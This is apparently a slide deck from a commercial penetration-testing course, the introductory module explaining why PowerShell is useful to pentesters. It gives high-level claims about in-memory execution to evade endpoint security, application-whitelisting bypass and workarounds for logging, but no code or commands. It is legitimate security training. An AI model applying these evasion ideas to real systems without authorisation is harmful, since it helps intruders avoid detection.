Add to collection(s) Add to saved
  1. No category
Uploaded by leonlastreet

Section 3 Module 1 Introduction

advertisement 
1.1 Why Powershell?
1.2 What IS Powershell?
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:
✓
The benefits of utilizing Powershell for penetration tests.
✓
What Powershell is at a high-level.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell is a powerful built-in shell
and scripting environment we can
utilize as penetration testers
considering its wide-spread availability
on all modern Windows-based
systems.
https://en.wikipedia.org/wiki/PowerShell
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
The use of Powershell allows us to take advantage of the “livingoff-the-land” concept, where using tools that are built-in to the
Operating System work to our advantage once we’ve obtained
access to a system.
https://www.secureworks.com/blog/living-off-the-land
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
There are many advantages to using Powershell as it
relates to penetration testing, with some of them being:
•
Many organizations aren’t actively hunting for Powershell activity
since it is usually considered a “trusted” application.
•
We can use Powershell to run, download or execute code, entirely
within the memory process of the Powershell executable, helping
us evade endpoint security solutions.
•
We can use it to interface with the .NET and other Windows APIs.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Advantages (continued):
•
We can call Windows DLL functions from within Powershell.
•
We can use it to bypass application whitelisting
implementations by running the usual operating system
commands from the Powershell CLI.
•
Many tools are already available to us for a large number of
purposes related to penetration testing.
https://github.com/PowerShellMafia/PowerSploit
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Having access to all of those things through Powershell helps us
reduce our footprint and evade defense mechanisms while
conducting post-exploitation tasks.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell is also easy to use, and there are many scripts and
frameworks written that we can utilize for our offensive purposes.
Furthermore, it doesn’t take much to create our own scripts to
carry out some of our tasks as we’ll see in the modules that follow.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell is a powerful built-in Command Line Interpreter or
“shell,” and task-oriented scripting language environment found on
most current Windows Operating Systems starting with Windows
7, and through to Windows 2008 R2 and onward.
https://en.wikipedia.org/wiki/PowerShell
https://en.wikipedia.org/wiki/Command-line_interface#Command-line_interpreter
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell is typically used by administrators as it provides great
functionality and flexibility in regards to managing Windows
systems and automating tasks, which is mostly the reason why it’s
the perfect tool when it comes to our process as penetration
testers.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell is tightly integrated with the .NET framework (built on
top of it actually).
It also provides convenient access to the .NET Framework API,
Component Object Model (COM) and Windows Management
Instrumentation (WMI), which is another plus in regard to
persistence methods and ways we can gather information as we’ll
see later.
https://en.wikipedia.org/wiki/.NET_Framework
https://en.wikipedia.org/wiki/Component_Object_Model
https://en.wikipedia.org/wiki/Windows_Management_Instrumentation
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Most of the time, we’ll either be working with scripts commonly
identified by the “.ps1” file extension, or through what are
known as “Cmdlets” (native Powershell commands) of which we
can also create our own, and other times, we’ll be interacting
directly with via the Powershell CLI.
https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
An important point to note as we navigate through the upcoming
topics is that more recent versions of Powershell, specifically 5.0
and onward, introduce some potential hurdles in regards to
detection, logging and more restrictive modes, which we will cover
workarounds for briefly.
For the most part, we will be working with version 1.0 or 2.0.
https://en.wikipedia.org/wiki/PowerShell#Versions
https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/
https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Advancements in the “freedom” of Powershell:
In 2016, Powershell 6.0 (Powershell Core) was made available as an open
source project and is available for several different platforms, including
some major Linux distributions, MacOS, and also as a Docker container
image.
You can learn more about Open source Powershell, and it can be
downloaded from the following github page:
https://github.com/powershell/powershell
https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
This concludes the Powershell For Pentesters Introduction
Module.
In this module, we covered:
✓
A brief introduction as to why Powershell is a great tool for
our purposes.
✓
A high-level overview of Powershell.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Powershell
Component Object Model
https://en.wikipedia.org/wiki/PowerShell
https://en.wikipedia.org/wiki/Component_O
bject_Model
Living Off The Land
Windows Management
Instrumentation
https://www.secureworks.com/blog/livingoff-the-land
Command Line Interpreter
https://en.wikipedia.org/wiki/Commandline_interface#Command-line_interpreter
.NET Framework
https://en.wikipedia.org/wiki/.NET_Framewo
rk
https://en.wikipedia.org/wiki/Windows_Man
agement_Instrumentation
Cmdlets
https://msdn.microsoft.com/enus/library/ms714395(v=vs.85).aspx
Powershell Versions
https://en.wikipedia.org/wiki/PowerShell#
Versions
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Constrained Language Mode
Script Block Logging
https://blogs.msdn.microsoft.com/powershel
l/2017/11/02/powershell-constrainedlanguage-mode/
https://www.crowdstrike.com/blog/investiga
ting-powershell-command-and-scriptlogging/
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Related documents
Anatomy quiz
Anatomy quiz
PPTX
PPTX
Failover-Clustering
Failover-Clustering
The benefits of exercise and The dangers of lack of exercise
The benefits of exercise and The dangers of lack of exercise
605 tree obstacle course
605 tree obstacle course
Activity 2
Activity 2
Influencer(s)
Influencer(s)
Untitled document
Untitled document
JOSH MADAKOR RESUME SWE
JOSH MADAKOR RESUME SWE
Download
advertisement